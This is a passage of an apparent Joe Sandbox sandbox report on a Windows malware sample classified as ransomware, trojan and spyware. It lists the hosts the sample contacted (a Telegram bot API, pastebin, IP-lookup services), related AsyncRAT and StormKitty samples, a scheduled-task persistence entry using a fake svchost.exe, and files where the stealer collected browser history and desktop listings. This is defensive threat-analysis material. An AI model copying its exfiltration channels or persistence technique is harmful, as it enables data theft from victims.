                    https://api.telegram.orgdudwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://support.mozilla.orgtmpAE3C.tmp.dat.28.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://api.mylnikov.orgdudwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.telegram.org/file/botsvchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplestmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://api.telegram.orgudwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://api.mylnikov.orgudwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pastebin.comluglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://pastebin.comluglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      104.21.44.66
                      		api.mylnikov.orgUnited States
                      		13335CLOUDFLARENETUSfalse
                      149.154.167.220
                      		api.telegram.orgUnited Kingdom
                      		62041TELEGRAMRUtrue
                      104.20.4.235
                      		pastebin.comUnited States
                      		13335CLOUDFLARENETUStrue
                      104.16.184.241
                      		icanhazip.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      94.232.249.111
                      		unknownSyrian Arab Republic
                      		29256INT-PDN-STE-ASSTEPDNInternalASSYtrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1464066
                      Start date and time:2024-06-28 11:18:03 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:39
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:zrrHgsDzgS.exe
                      renamed because original name is a hash value
                      Original Sample Name:6d13d147a209e3be044035f0c03b7bde.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.evad.winEXE@60/232@7/6
                      EGA Information:
                      • Successful, ratio: 40%
                      HCA Information:
                      • Successful, ratio: 95%
                      • Number of executed functions: 544
                      • Number of non-executed functions: 20
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target svchost.exe, PID 3620 because it is empty
                      • Execution Graph export aborted for target svchost.exe, PID 7060 because it is empty
                      • Execution Graph export aborted for target zrrHgsDzgS.exe, PID 6452 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      05:19:25API Interceptor8x Sleep call for process: powershell.exe modified
                      05:19:37API Interceptor442227x Sleep call for process: udwnme.exe modified
                      05:19:51API Interceptor37098x Sleep call for process: luglzv.exe modified
                      10:19:01Task SchedulerRun new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.21.44.66H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                        SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                          t3h7DNer1Q.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                            vp2Gd0kDCt.exeGet hashmaliciousAsyncRAT, EICAR, RedLine, StormKitty, VenomRATBrowse
                              a.cmdGet hashmaliciousUnknownBrowse
                                UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                  HTZ4az17lj.exeGet hashmaliciousStormKittyBrowse
                                    ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                      YVrNKlaWqu.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                        hesaphareketi-01.pdf.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                          149.154.167.220H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                            w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                              qRD5vu6vkf.exeGet hashmaliciousXWormBrowse
                                                245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  Swift 409452623.88 copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    (PO N 4700001838.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                      new contract.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        chromeUpdate.exeGet hashmaliciousUnknownBrowse
                                                          4h4b4EWVNU.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            DHL Shipment Document Original BL Invoice Packing List.exeGet hashmaliciousAgentTeslaBrowse
                                                              104.20.4.235New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr
                                                              Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr
                                                              Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr
                                                              Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr
                                                              Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              pastebin.comH1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 172.67.19.24
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 104.20.3.235
                                                              k43lWDu3AB.exeGet hashmaliciousDCRatBrowse
                                                              • 104.20.4.235
                                                              ClientAny.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                              • 104.20.3.235
                                                              qHYHgANDmm.exeGet hashmaliciousRedLine, XmrigBrowse
                                                              • 172.67.19.24
                                                              MzMXVPEjdy.exeGet hashmaliciousDCRatBrowse
                                                              • 104.20.3.235
                                                              Resolucion Juridica Bloqueo Cuentas y servicios SRI.vbs.xzGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              d43YUxXAW7.exeGet hashmaliciousDCRatBrowse
                                                              • 104.20.4.235
                                                              IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                                                              • 104.20.4.235
                                                              api.mylnikov.orgH1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 104.21.44.66
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 172.67.196.114
                                                              setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                              • 172.67.196.114
                                                              Hniunx426q.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWormBrowse
                                                              • 172.67.196.114
                                                              SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                                              • 104.21.44.66
                                                              t3h7DNer1Q.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                              • 104.21.44.66
                                                              vp2Gd0kDCt.exeGet hashmaliciousAsyncRAT, EICAR, RedLine, StormKitty, VenomRATBrowse
                                                              • 104.21.44.66
                                                              vp2Gd0kDCt.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                              • 172.67.196.114
                                                              a.cmdGet hashmaliciousUnknownBrowse
                                                              • 104.21.44.66
                                                              UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                              • 104.21.44.66
                                                              icanhazip.comH1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 104.16.184.241
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 104.16.185.241
                                                              data-sheet.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 104.16.184.241
                                                              Enquiry_-_Dubai.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 104.16.184.241
                                                              wssvZm9dNK.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 104.16.185.241
                                                              setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                              • 104.16.185.241
                                                              INQUIRY.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 104.16.185.241
                                                              Data-Sheet.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 104.16.184.241
                                                              Order Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 104.16.185.241
                                                              Hniunx426q.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWormBrowse
                                                              • 104.16.185.241
                                                              api.telegram.orgH1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 149.154.167.220
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 149.154.167.220
                                                              qRD5vu6vkf.exeGet hashmaliciousXWormBrowse
                                                              • 149.154.167.220
                                                              245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 149.154.167.220
                                                              Swift 409452623.88 copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 149.154.167.220
                                                              (PO N 4700001838.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 149.154.167.220
                                                              new contract.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 149.154.167.220
                                                              chromeUpdate.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              4h4b4EWVNU.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                              • 149.154.167.220
                                                              DHL Shipment Document Original BL Invoice Packing List.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 149.154.167.220

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              TELEGRAMRU1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                              • 149.154.167.99
                                                              H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 149.154.167.220
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 149.154.167.220
                                                              https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • 149.154.167.99
                                                              project.exeGet hashmaliciousRedLineBrowse
                                                              • 149.154.167.99
                                                              WR0fuHnEVW.exeGet hashmaliciousVidarBrowse
                                                              • 149.154.167.99
                                                              BRWgvKaqbg.exeGet hashmaliciousPureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                                                              • 149.154.167.99
                                                              qRD5vu6vkf.exeGet hashmaliciousXWormBrowse
                                                              • 149.154.167.220
                                                              245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 149.154.167.220
                                                              https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • 149.154.167.99
                                                              CLOUDFLARENETUShttps://qrco.de/bfBwJlGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Urgent PO.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.12.205
                                                              Factura 422934 pago bbva swift.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                              • 188.114.97.3
                                                              ELECTRONIC RECEIPT_Ashleyann.htmlGet hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 104.16.184.241
                                                              faturas_dsp.qs.pt_Wednesday, June 5, 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 172.67.196.150
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 172.67.196.114
                                                              4TwN2MkH2l.rtfGet hashmaliciousUnknownBrowse
                                                              • 104.21.83.128
                                                              QoNAd2x2wy.rtfGet hashmaliciousUnknownBrowse
                                                              • 104.21.83.128
                                                              CLOUDFLARENETUShttps://qrco.de/bfBwJlGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Urgent PO.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.12.205
                                                              Factura 422934 pago bbva swift.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                              • 188.114.97.3
                                                              ELECTRONIC RECEIPT_Ashleyann.htmlGet hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 104.16.184.241
                                                              faturas_dsp.qs.pt_Wednesday, June 5, 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 172.67.196.150
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 172.67.196.114
                                                              4TwN2MkH2l.rtfGet hashmaliciousUnknownBrowse
                                                              • 104.21.83.128
                                                              QoNAd2x2wy.rtfGet hashmaliciousUnknownBrowse
                                                              • 104.21.83.128
                                                              CLOUDFLARENETUShttps://qrco.de/bfBwJlGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Urgent PO.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.12.205
                                                              Factura 422934 pago bbva swift.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                              • 188.114.97.3
                                                              ELECTRONIC RECEIPT_Ashleyann.htmlGet hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 104.16.184.241
                                                              faturas_dsp.qs.pt_Wednesday, June 5, 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 172.67.196.150
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 172.67.196.114
                                                              4TwN2MkH2l.rtfGet hashmaliciousUnknownBrowse
                                                              • 104.21.83.128
                                                              QoNAd2x2wy.rtfGet hashmaliciousUnknownBrowse
                                                              • 104.21.83.128
                                                              INT-PDN-STE-ASSTEPDNInternalASSYw5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 94.232.249.111
                                                              SecuriteInfo.com.FileRepMalware.3625.5069.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                              • 94.232.249.86
                                                              Form_Ver-14-00-21 (1).jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                              • 94.232.249.86
                                                              http://85.208.108.63/BST.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                              • 94.232.249.87
                                                              Form_Ver-13-59-03 (1).jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                              • 94.232.249.86
                                                              https://firebasestorage.googleapis.com/v0/b/namo-426715.appspot.com/o/PqA45bE7me%2FForm_Ver-11-58-52.js?alt=media&token=dc88189e-81de-49e9-879e-365bc76e3567Get hashmaliciousBruteRatel, LatrodectusBrowse
                                                              • 94.232.249.87
                                                              Form_Ver-18-13-38.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                              • 94.232.249.86
                                                              jzXBbfutn2.elfGet hashmaliciousUnknownBrowse
                                                              • 188.247.2.149
                                                              out.x86.elfGet hashmaliciousMiraiBrowse
                                                              • 188.247.28.128
                                                              bVMuPnsMIq.elfGet hashmaliciousMiraiBrowse
                                                              • 31.14.164.34

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eUrgent PO.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              Factura 422934 pago bbva swift.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              k43lWDu3AB.exeGet hashmaliciousDCRatBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              https://t4ha7.shop/Get hashmaliciousUnknownBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              http://www.youkonew.anakembok.de/Get hashmaliciousUnknownBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              http://www.services-nickel.yayra-food.com/Get hashmaliciousUnknownBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              https://linnil.pwq.workers.dev/Get hashmaliciousUnknownBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235
                                                              https://nsfgrs03.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.21.44.66
                                                              • 149.154.167.220
                                                              • 104.20.4.235

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\AppData\Local\Temp\udwnme.exew5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                                                                C:\Users\user\AppData\Roaming\svchost.exew5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Browsers\Firefox\Bookmarks.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):105
                                                                  Entropy (8bit):3.8863455911790052
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                  MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                  SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                  SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                  SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                  Malicious:false
                                                                  Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Browsers\Firefox\History.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-8 text
                                                                  Category:dropped
                                                                  Size (bytes):94
                                                                  Entropy (8bit):4.886397362842801
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                  Malicious:false
                                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Browsers\Google\History.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1393
                                                                  Entropy (8bit):5.241470443395582
                                                                  Encrypted:false
                                                                  SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                  MD5:7F24357FFA354F2471DED45552B897D7
                                                                  SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                  SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                  SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                  Malicious:false
                                                                  Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Desktop.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):821
                                                                  Entropy (8bit):5.246999163355071
                                                                  Encrypted:false
                                                                  SSDEEP:24:CZksCekV1LFTNkYQAkfAwO8I+bIPjMMPR0YZI5OLcx0gaaFPRYZX:MeeKj+fTOTPAMP1GNR2X
                                                                  MD5:7D272999F3771275B69C5D01FDE300D3
                                                                  SHA1:5A97E296F4D22652712B13E95AAB3765643982BA
                                                                  SHA-256:84FA0C25B878C62D3FA2AFAC34F6BB459FC9C6CE7A26C19932DC22BBA000E308
                                                                  SHA-512:7DFDB802E44E9A794216C3B345F645811FE3F31B295126697EBF16F6BD8C2AB599A81038C551143C45EFF0B40DBE3CF0386BCF95189903198CFA179E7EB7193E
                                                                  Malicious:false
                                                                  Preview:Desktop\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...NIKHQAIQAU\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...RAYHIWGKDI\...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....JSDNGYCOWY.mp3....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...Excel.lnk...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg...zrrHgsDzgS.exe..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Documents.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
